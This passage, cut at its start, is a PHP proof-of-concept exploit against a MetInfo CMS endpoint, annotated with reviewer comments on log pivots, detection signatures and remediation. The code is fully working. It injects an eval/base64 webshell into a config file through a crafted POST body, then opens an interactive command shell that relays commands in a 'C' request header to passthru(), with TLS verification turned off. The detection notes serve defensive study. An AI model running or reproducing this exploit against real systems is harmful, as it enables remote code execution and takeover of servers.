\n\n");

// NOTE(review): the statement closed on the line above starts outside this chunk,
// so its purpose cannot be confirmed from here.
//
// Everything below is a proof-of-concept client. It sends two kinds of POST request
// to one application endpoint, then relays operator-typed commands through a request
// header. The comments describe what the visible code does and what each step looks
// like from the server side, for log review and rule writing.

// One cURL handle is reused for every request in the script.
$ch = curl_init();

// The endpoint is the base URL from the first CLI argument with a fixed path and query
// appended. Log/IDS pivot: POST requests to
// app/system/entrance.php?n=include&m=module&c=weixin&a=doapi
curl_setopt($ch, CURLOPT_URL, "{$argv[1]}app/system/entrance.php?n=include&m=module&c=weixin&a=doapi");

// Return the response body as a string so it can be pattern-matched below.
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

// TLS hostname and certificate verification are both disabled, so the peer is never
// authenticated and the traffic can be intercepted or redirected in transit.
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

// Disabled debugging aid: would route traffic through a local intercepting proxy.
//curl_setopt($ch, CURLOPT_PROXY, "http://127.0.0.1:8080");

print "\n[+] Injecting PHP webshell\n";

// Stage 1 request body. Because the string is single-quoted, nothing in it is
// evaluated locally; it is sent verbatim. It contains:
//   - a "../config/tables" fragment (relative path with a parent-directory step),
//   - PHP complex-variable syntax "{${ ... }}" wrapping eval(base64_decode(...)),
//   - a $_SERVER key spelled with chr(): 72,84,84,80,95,67 is "HTTP_C", which is where
//     PHP exposes a request header named "C",
//   - a second "{${die()}}" expression.
// NOTE(review): how the server stores or interprets this value is not visible in this
// chunk; presumably it ends up in a PHP file under the application's config
// directory. Confirm against the vendor advisory.
// Detection: "${" or "eval(" in a POST body sent to this endpoint is a high-confidence
// signature. Remediation on the server side is to treat this field strictly as data
// (validate or encode it before it reaches any PHP source or config file) and to check
// the config directory for unexpected PHP expressions.
$payload = 'eventSCANadminlogin&../config/tables{${eval(base64_decode($_SERVER[chr(72).chr(84).chr(84).chr(80).chr(95).chr(67)]))}}.{${die()}}';

// A string passed to CURLOPT_POSTFIELDS is sent as the raw POST body (and makes the
// request a POST). Note the body is not well-formed key=value form data.
curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);

// The script treats the literal word "success" anywhere in the response as
// confirmation and aborts otherwise.
if (!preg_match("/success/", curl_exec($ch))) die("[-] Injection failed!\n\n");

print "[+] Launching webshell\n";

// Template for the code carried in the "C" header on each later request: change
// directory two levels up, print a five-underscore marker, run the base64-decoded
// command through passthru(), print the marker again. %s is filled in by sprintf()
// in the loop below.
$phpcode = "chdir('../..'); print '_____'; passthru(base64_decode('%s')); print '_____';";

// Stage 2 request body, reused unchanged for every command.
// Log pivot: POST bodies beginning with "eventSCANadminlogin&".
$payload = 'eventSCANadminlogin&Array';
curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);

// Interactive loop: one HTTP request per line read from STDIN, until "exit" is typed.
while(1) {
    print "\nmetinfo-shell# ";

    // Read one line, strip surrounding whitespace; the literal "exit" ends the loop.
    if (($cmd = trim(fgets(STDIN))) == "exit") break;

    // The command is base64-encoded, substituted into $phpcode, and the result is
    // base64-encoded again and sent as the value of a request header named "C".
    // Detection: a one-letter "C" header with a long base64 value is abnormal for
    // this application and is a practical alerting condition at the proxy or WAF.
    curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: " . base64_encode(sprintf($phpcode, base64_encode($cmd)))]);

    // Output is whatever sits between the two "_____" markers in the response; the /s
    // flag lets "." span newlines. A response without the markers ends the script.
    // Detection: responses from this endpoint containing the "_____" delimiters.
    preg_match("/_____(.*)_____/s", curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n\n");
}